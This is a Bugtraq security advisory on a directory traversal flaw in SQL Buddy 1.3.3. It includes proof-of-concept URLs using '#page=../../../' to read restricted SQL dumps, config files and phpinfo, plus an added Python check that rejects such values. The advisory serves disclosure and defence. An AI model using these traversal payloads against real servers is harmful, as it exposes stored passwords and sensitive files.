Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
- From: apparitionsec@xxxxxxxxx
- Date: Sat, 9 May 2015 04:39:55 GMT
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability.
Vendor:
http://www.sqlbuddy.com
Release Date:
=============
05-08-2015
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product:
===============================
sqlbuddy version 1.3.3. SQL Buddy is an open-source, web-based MySQL
administration application.
Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories and read any PHP and non-PHP files by appending
the '#' hash character when requesting files via URLs,
e.g. .doc, .txt, .xml, .conf, .sql etc.
After adding the '#' character as a delimiter, any non-PHP file will be returned and
rendered, subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via the POST method.
Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>
POC exploit payloads:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo
Disclosure Timeline:
==================================
Vendor Notification N/A
May 8, 2015: Public Disclosure - hyp3rlinx
Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#
Severity Level:
===============
High
Description:
==========================
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=somefile
Affected Area(s):
[+] Server directories & sensitive files
Solution - Fix & Patch:
=======================
N/A
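No vendor fix is listed. As an added illustration that is not SQL Buddy's code (and written in Python rather than the project's PHP), the resolver below shows the checks a page-include routine needs so that values such as "../../../test.txt#" can never reach the filesystem: a strict character allowlist applied before any path is built (which rejects '/', '.', '#' and NUL), an allowlist of page names, and a realpath containment check. The page names and base directory are assumptions chosen for the example.

```python
import os
import re

# Pages the application is willing to include; constructed for this example.
ALLOWED_PAGES = {"home", "login", "query"}

# Only letters, digits, '_' and '-': no '/', '\\', '.', '#' or NUL can pass.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_page(page: str, base_dir: str) -> str:
    """Map an untrusted 'page' value to a .php file inside base_dir.

    Raises ValueError on any input that is not an exact, allowlisted page
    name, or whose resolved path would leave base_dir.
    """
    # 1. Character allowlist: blocks traversal and delimiter tricks up front.
    if not _SAFE_NAME.fullmatch(page):
        raise ValueError("page contains disallowed characters")
    # 2. Name allowlist: only pages the application actually ships.
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    # 3. Containment: the '.php' suffix is appended by us, never by the client,
    #    and the final real path must still sit under base_dir.
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes base directory")
    return candidate


def is_safe_page(page: str, base_dir: str = "/var/www/sqlbuddy") -> bool:
    """Convenience wrapper: True if resolve_page accepts the value."""
    try:
        resolve_page(page, base_dir)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for value in ("home", "home#", "../../../test.txt#", "../../../../xampp/phpinfo"):
        print(f"{value!r}: {'accepted' if is_safe_page(value) else 'rejected'}")
```

Rejecting bad characters before path construction is what matters here: a containment check alone would still let a name like "home#" through if the surrounding code later cuts the string at '#'.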
Credits: John Page ( hyp3rlinx )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any
warranty. The security research reporter John Page disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. apparitionsec or its suppliers are not
liable in any case of damage, including direct, indirect, incidental or
consequential loss of business profits or special damages.
Domains: hyp3rlinx.altervista.org